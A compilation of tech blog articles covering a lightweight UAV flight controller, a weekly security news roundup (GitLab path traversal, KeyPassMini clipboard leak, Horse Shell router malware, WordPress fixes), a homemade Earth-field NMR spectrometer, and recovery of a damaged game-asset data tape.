UAV Flight Controller Saves Weight

When building autonomous airborne vehicles like drones or UAVs, saving a little bit of weight goes a long way, literally. Every gram saved means less energy needed to keep the aircraft aloft and ultimately more time in the air, but unmanned vehicles often need to compromise some on weight in order to carry increased computing abilities. Thankfully this one carries a dizzying quantity of computer power for an absolute minimum of weight, and has some clever design considerations to improve its performance as well.

The advantage of this board compared to other similar offerings is that it is built to host a Raspberry Pi Compute Module 4, while the rest of the flight controllers are separated out onto a single circuit board. This means that the Pi is completely sandboxed from the flight control code, freeing up computing power on the Pi and allowing it to run a UAV-specific OS like OpenHD or RubyFPV. These have a number of valuable tools available for unmanned flight, such as setting up a long range telemetry and camera links. The system itself supports dual HD camera input as well as additional support for other USB devices, and also includes an electronic speed controller mezzanine which has support for quadcopters and fixed wing crafts.

Separating non-critical tasks like cameras and telemetry from the more important flight controls has a number of benefits as well, including improved reliability and simpler software and program design. And with a weight of only 30 grams, it won’t take too much cargo space on most UAVs. While the flight computer is fairly capable of controlling various autonomous aircraft, whether it’s a multi-rotor like a quadcopter or a fixed wing device, you might need a little more computing power if you want to build something more complicated.

This Week In Security: Gitlab, KeyPassMini, And Horse

There’s a really nasty CVSS 10.0 severity vulnerability in Gitlab 16.0.0. The good news is that this is the only vulnerable version, and the fix came a mere two days after the vulnerable release. If you happened to be very quick to go to 16.0.0, then be very quick to get the fix, because CVE-2023-2825 looks like a bad one.

An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.

That’s a very specific set of requirements for vulnerability, so it seems like hardly any installs would be vulnerable. The rest of the story is that regular users can create groups, and many installs allow for open user registration. So if you’re running Gitlab 16.0.0, update now!

KeyPassMini

A Redditor got a surprising notice that someone attempted to access a bank account, but failed two-factor authentication. That seemed odd, and led the Redditor down the rabbithole of auditing applications. And one iOS app in particular stood out as maybe problematic — KeyPassMini.

The app was a mobile client for KeyPass, the password manager. The problem was some analytics. It looks like KeyPassMini was bundling up some system information and uploading it to a server controlled by the creator. Analytics are often unpopular, but this app was including the system clipboard contents in the uploaded data. Yikes! And it gets worse: The app does password fills by using that same clipboard, so some of the protected passwords may have been scooped up into that analytics data. And sent unencrypted. Oof.

Now, the app author has pulled the plug on the app altogether, and responded on the old Github project page. It’s a bit odd, but it’s perfectly believable that there were no ill intentions here. Regardless, code to send the clipboard is a big problem, and definitely undoes a lot of trust in a project.

And KeyPass itself has a problem, though much less worrying. KeyPass attempts to keep sensitive data out of its own memory when possible. This approach aims to protect even in the event of a compromised machine. [vdohney] on Sourceforge discovered that there is a channel to recover the master password, by being just a bit clever. When a user types in the master password, by default, KeyPass will show the last letter typed, and replace the previous letters with bullets. But each iteration of that string ends up in program memory, so a privileged attacker can get a memory dump, look for the bullet characters, and find a set of leftover strings like •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. It’s an easy password grab. Now remember, this essentially implies an attacker has memory access on your system, so it’s not a gaping weakness in KeyPass.

As you can see from the POC on GitHub, the problem is that a .NET text box keeps the strings in memory, so it probably hits both Windows and Linux users under Mono. The proposed solution that the KeyPass team is taking is to poison the well with enough random characters that retrieving the correct password is a lot harder. It’s still getting fixed in the next release.

Horse Shell for MIPS Routers

Checkpoint Research brings us news of the Horse Shell, a bit of malware specifically for MIPS architecture routers running Linux. It’s been found in TP-Link firmware images so far, but as so many of those routers are essentially based on the same Linux SDK, the malware appears to be applicable to many models. The exact firmware images being examined were found in a collection of tools used by Camaro Dragon, a rather catchy name for a Chinese APT group.

The firmware images have some of the normal bits you would expect, like data collection, remote shell, and remote proxy support. They have some really sneaky tricks, too, like storing part of the data on the partition reserved for WiFi calibration data. One has to wonder if hijacking that partition negatively affects the router’s wireless performance. In the firmware images examined, the quickest tell is to go to the firmware upgrade page. If it’s blank, without a form to upload new firmware, you may have the malicious image.

WordPress

WordPress 6.2.1 has a security fix, that is then improved upon in 6.2.2, where block themes could parse user-generated shortcodes. A shortcode is tags inside [brackets], that gets replaced by more complicated data. We use a code shortcode all the time here on Hackaday, to try to get source code to render nicely, angle brackets and all.

It turns out, the fix in 6.2.1 went a little overboard, breaking quite a few sites by disabling shortcodes in block themes altogether. The situation in 6.2.2 is a bit better, with most of the problems being dealt with. Sometimes it’s hard to tell the bugs and the features apart.

And a WordPress plugin, Beautiful Cookie Consent Banner, is under active attack for a Cross-Site Scripting vulnerability. The attack is odd, as WordPress.org shows just 40,000 active installs, and almost 1.5 million sites have been sent the malicious payload to try to exploit the plugin. And the kicker? It looks like the payload on this attack is a dud, and fails to actually infect a vulnerable site. It can still goober a vulnerable site, so make sure to check your plugins.

Bits and Bytes

Speaking of plugins, be careful what VScode plugins you use. They’re not all friendly. Microsoft has been working to keep malicious plugins off the official marketplace, but that arms race never seems to have an end. And as such, there were a couple known malicious plugins with nearly 50,000 installs.

For some in-depth fun, check out this PDF paper on Android Fingerprint Reader attacks. It seems simple, right? Take a screenshot of a finger, compare it to a known data set, and lock the phone if the test fails too many times. It is, of course, not quite that simple. Researchers formulated two loopholes, Cancel-After-Match-Fail and Match-After-Lock, both of which abuse user-friendly features to manage way more attempts at a fingerprint read. Read the paper for the juicy details.

And finally, Troy Hunt had some fun at the expense of a scammer. Troy’s wife was selling a fridge on Gumtree, and they decided to play along with a suspicious “buyer”. Turns out, it’s the old agent fee scam. I’ll give you the money you asked for, plus $800 to cover the fee. Can you forward that extra money on? But of course, the Paypal confirmation message was faked, and there was no money paid. Troy managed to get an impressive bit of information, including that the scam is actually being run out of, you guessed it, Nigeria. Shipping would be a pain. ><

Getting Into NMR Without The Superconducting Magnet

Exploring the mysteries of quantum mechanics surely seems like an endeavor that requires room-sized equipment and racks of electronics, along with large buckets of grant money, to accomplish. And while that’s generally true, there’s quite a lot that can be accomplished on a considerably more modest budget, as this as-simple-as-it-gets nuclear magnetic resonance spectroscope amply demonstrates.

First things first: Does the “magnetic resonance” part of “NMR” bear any relationship to magnetic resonance imaging? Indeed it does, as the technique of lining up nuclei in a magnetic field, perturbing them with an electromagnetic field, and receiving the resultant RF signals as the nuclei snap back to their original spin state lies at the heart of both. And while MRI scanners and the large NMR spectrometers used in analytical chemistry labs both use extremely powerful magnetic fields, [Andy Nicol] shows us that even the Earth’s magnetic field can be used for NMR.

[Andy]’s NMR setup couldn’t be simpler. It consists of a coil of enameled copper wire wound on a 40 mm PVC tube and a simple control box with nothing more than a switch and a couple of capacitors. The only fancy bit is a USB audio interface, which is used to amplify and digitize the 2-kHz-ish signal generated by hydrogen atoms when they precess in Earth’s extremely weak magnetic field. A tripod stripped of all ferrous metal parts is also handy, as this setup needs to be outdoors where interfering magnetic fields can be minimized. In use, the coil is charged with a LiPo battery for about 10 seconds before being rapidly switched to the input of the USB amp. The resulting resonance signal is visualized using the waterfall display on SDR#.

[Andy] includes a lot of helpful tips in his excellent write-up, like tuning the coil with capacitors, minimizing noise, and estimating the exact resonance frequency expected based on the strength of the local magnetic field. It’s a great project and a good explanation of how NMR works. And it’s nowhere near as loud as an MRI scanner.

When The Professionals Trash Your Data Tape, Can It Still Be Recovered?

People trying to preserve digital artifacts held on old media often not only have to contend with the media themselves decaying, but also with obscure media formats for which there’s seemingly little chance of finding a working reader. [Kneesnap] had this problem with a tape containing the only known copy of all the assets for the game Frogger 2: Swampy’s Revenge, and the tale of how the data was recovered is a dive into both the shady side of the data recovery industry and some clever old-format hacking.

The tape was an Onstream cartridge, a short-lived format from a company whose first product hit the market at the end of the ’90s and who went bust in 2004. An old drive was found, but it proved to have a pinch roller melted with age, so in desperation the tape was sent to a data recovery company.

We admire the forbearance in not naming and shaming the data recovery company, because far from recovering the data they sent it back with the tape damaged and spliced — something you can do with an analogue tape but not a digital one without compromising the data. Then faced with an unrecoverable tape and a slightly different Onstream cartridge, how could anything be salvaged?

The answer came in overriding the drive’s sensors and initializing it with a known-good tape, then swapping out the tapes so that the drive, unaware anything had changed, could read whatever data it could find. In the event the vast majority of the archive was retrieved, making it a win for the preservation of that game.

This may be more involved than some recovery stories, but it’s not the first we’ve covered.